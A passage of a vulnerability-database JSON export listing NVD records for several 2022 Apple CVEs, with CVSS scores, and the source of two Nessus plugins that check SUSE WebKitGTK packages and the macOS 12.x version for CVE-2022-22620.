"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22594", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22594"], "modified": "2022-03-28T16:40:00", "cpe": [], "id": "CVE-2022-22594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22594", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-11-27T14:24:46", "description": "A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22587", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-28T16:49:00", "cpe": [], "id": "CVE-2022-22587", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-27T14:24:54", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22620", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-09-09T20:41:00", "cpe": [], "id": "CVE-2022-22620", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22620", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "nessus": [{"lastseen": "2023-07-14T14:55:18", "description": "The remote SUSE Linux SLES12 / SLES_SAP12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2022:0811-1 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8).\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2022-22620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-12T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2022:0811-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2023-07-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2022-0811-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158885", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:0811-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158885);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/14\");\n\n script_cve_id(\"CVE-2022-22620\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/25\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:0811-1\");\n\n script_name(english:\"SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2022:0811-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 / SLES_SAP12 host has packages installed that are affected by a vulnerability as referenced\nin the SUSE-SU-2022:0811-1 advisory.\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in macOS\n Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8).\n Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a\n report that this issue may have been actively exploited.. (CVE-2022-22620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1196133\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22620\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-March/010419.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2c03dfe1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22620\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12|SLES_SAP12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12 / SLES_SAP12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP12\" && (! preg(pattern:\"^(3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP12 SP3/4/5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'3', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'4', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'webkit2gtk3-devel-2.34.6-2.88.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'webkit2gtk3-devel-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'2', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'webkit2gtk3-devel-2.34.6-2.88.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libwebkit2gtk-4_0-37-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libwebkit2gtk3-lang-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.34.6-2.88.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libjavascriptcoregtk-4_0-18 / libwebkit2gtk-4_0-37 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:41:54", "description": "The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.2.1 Monterey. It is, therefore, affected by a use after free issue which was addressed with improved memory management. Successful exploitation could lead to arbitrary code execution on an affected host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2022-02-18T00:00:00", "type": "nessus", "title": "macOS 12.x < 12.2.1 (HT213092)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_HT213092.NASL", "href": "https://www.tenable.com/plugins/nessus/158163", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158163);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2022-22620\");\n script_xref(name:\"APPLE-SA\", value:\"HT213092\");\n script_xref(name:\"IAVA\", value:\"2022-A-0082-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/25\");\n\n script_name(english:\"macOS 12.x < 12.2.1 (HT213092)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 12.x prior to 12.2.1 Monterey. It is, therefore,\naffected by a use after free issue which was addressed with improved memory management. Successful exploitation could\nlead to arbitrary code execution on an affected host.\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT213092\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 12.2.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22620\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/local_checks_enabled\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_apple.inc');\n\nvar app_info = vcf::apple::macos::get_app_info();\nvar 